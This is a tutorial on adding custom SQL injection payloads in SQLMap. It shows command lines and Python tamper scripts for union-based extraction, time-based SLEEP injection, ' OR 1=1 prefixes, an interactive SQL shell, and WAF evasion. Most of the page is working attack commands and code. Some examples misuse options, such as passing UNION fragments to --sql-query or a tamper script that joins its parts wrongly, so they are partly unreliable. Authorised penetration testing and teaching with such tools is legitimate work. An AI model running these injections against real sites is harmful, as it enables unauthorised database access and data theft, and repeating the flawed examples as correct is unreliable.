🔄Adding Custom Payloads Directly in SQLMap Syntax

SQLMap allows you to specify your own SQL queries using the `--sql-query option`. This is particularly useful when you want to inject specific payloads to test for SQL injection vulnerabilities.

You can add custom payloads directly within the SQLMap syntax using the --sql-query option or by customizing the payloads through tamper scripts. Below, I will show you how to add custom payloads directly using SQLMap as well as through tamper scripts.

Adding Custom Payloads Directly in SQLMap

SQLMap allows you to specify your own SQL queries using the --sql-query option. This is particularly useful when you want to inject specific payloads to test for SQL injection.

Example: Using --sql-query

  1. Simple Custom Payload

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT version()"
  2. Union-Based Custom Payload

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="UNION SELECT null, database(), user(), version()"

Customizing Payloads with Tamper Scripts

If you need more flexibility and want to systematically apply custom payloads, you can create a tamper script that modifies the default payloads used by SQLMap.

Example: Custom Tamper Script

  1. Create a Custom Tamper Script

    Create a new Python file in the tamper directory of your SQLMap installation, for example, custom_payload_tamper.py.

    #!/usr/bin/env python
    import random
    __priority__ = 1
    def dependencies():
        pass
    def tamper(payload):
        """
        Custom tamper script to inject custom payloads
        """
        if payload:
            # Example of replacing spaces with comments and adding a custom payload
            payload = payload.replace(" ", "/**/")
            if "SELECT" in payload.upper():
                payload = payload.replace("SELECT", "SELECT/**/custom_function(),")
        return payload
  2. Save the Script

    Save this script in the tamper directory of SQLMap.

  3. Use the Tamper Script with SQLMap

    Run SQLMap with your custom tamper script to apply your modifications to the payloads.

    sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=custom_payload_tamper

Advanced Example with Multiple Payloads

You can combine multiple payloads and tamper scripts to create more complex injection tests. Below is an advanced example where custom payloads are systematically applied to the requests.

Example: Combining Multiple Techniques

  1. Create a Complex Tamper Script

    #!/usr/bin/env python
    
    import random
    
    __priority__ = 1
    
    def dependencies():
        pass
    
    def tamper(payload):
        """
        Custom tamper script to apply multiple custom payloads
        """
        if payload:
            payload = payload.replace(" ", "/**/")
            
        
            if "UNION" in payload.upper():
                payload += " UNION SELECT null, user(), database(), version() --"
            
             
            if "AND" in payload.upper():
                payload += " AND IF(1=1, SLEEP(5), 0) --"
            
            
            if "OR" in payload.upper():
                payload += " OR (SELECT 1/0 FROM dual) --"
            
        return payload
  2. Save and Use the Script

    Save this script as complex_tamper.py in the tamper directory.

  3. Run SQLMap with the Complex Tamper Script

    sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=complex_tamper

Leveraging SQLMap's --sql-query Option

The --sql-query option allows you to directly specify SQL queries to be executed. This is useful for precise injection testing.

Examples: Custom Queries with --sql-query

  1. Direct Version Query

    This command checks the version of the database:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT version()"
  2. Union-Based Query

    This command retrieves multiple pieces of information such as the database name, current user, and database version:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="UNION SELECT null, database(), user(), version()"
  3. Subquery Injection

    This command uses a subquery to extract table names:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-query="SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)"

Using --sql-shell for Interactive Injection

SQLMap's --sql-shell provides an interactive SQL shell for executing arbitrary SQL commands.

Example: Starting SQL Shell

  1. Interactive Shell

    Start an interactive SQL shell to manually execute SQL commands:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --sql-shell
  2. Executing Commands in Shell

    Execute commands in the SQL shell to retrieve information:

    sql-shell> SELECT user();
    sql-shell> SELECT database();
    sql-shell> SELECT table_name FROM information_schema.tables;

Creating Custom Tamper Scripts

Tamper scripts can modify payloads dynamically to bypass WAFs and other security measures.

Example: Advanced Custom Tamper Script

  1. Script to Add Random Comments

    Create a script random_comment_tamper.py:

    #!/usr/bin/env python
    
    import random
    
    __priority__ = 1
    
    def dependencies():
        pass
    
    def tamper(payload):
        """
        Adds random inline comments to the payload
        """
        if payload:
            parts = payload.split(" ")
            payload = " /*" + str(random.randint(1000, 9999)) + "*/ ".join(parts)
        return payload
  2. Save and Use the Script

    Save this script in the tamper directory of SQLMap and use it:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_comment_tamper

Custom Payloads with --prefix and --suffix

You can use --prefix and --suffix to add custom SQL snippets before and after the payload.

Examples: Using --prefix and --suffix

  1. Adding Prefix and Suffix

    Add custom snippets before and after the payload:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --prefix="/**/SELECT/**/" --suffix="/**/FROM/**/dual"
  2. Injecting with Custom Wrappers

    Wrap the payload with custom conditions:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --prefix="' OR 1=1; /*" --suffix="*/ --"

Using SQLMap's --eval Option

The --eval option allows for evaluating Python code before sending requests, which can be used for dynamic payload generation.

Example: Dynamic Payload Generation with --eval

  1. Dynamic Generation

    Generate a dynamic payload using Python code:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --eval="import random; id=random.randint(1,10)"

Combining Techniques for Automated Testing

You can combine multiple techniques for comprehensive automated testing.

Example: Full Automated Test with Custom Payloads

  1. Advanced Custom Payloads in Combination

    Combine various methods to create a comprehensive testing command:

    sqlmap -u "http://example.com/vulnerable.php?id=1" \
       --sql-query="UNION SELECT null, database(), user(), version()" \
       --tamper=random_comment_tamper \
       --prefix="' OR 1=1; /*" \
       --suffix="*/ --" \
       --level=5 --risk=3

Example of an Advanced Tamper Script for Automated Testing

Example: Randomized Time-Based Injection

  1. Script random_time_tamper.py

    Create a script to add random time-based delays to the payload:

    #!/usr/bin/env python
    
    import random
    
    __priority__ = 1
    
    def dependencies():
        pass
    
    def tamper(payload):
        """
        Adds a random time-based delay to the payload
        """
        if payload:
            delay = random.randint(1, 10)
            payload = payload.replace(" ", "/**/") + f" AND SLEEP({delay})"
        return payload
  2. Use with SQLMap

    Use the script with SQLMap:

    sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_time_tamper

Last updated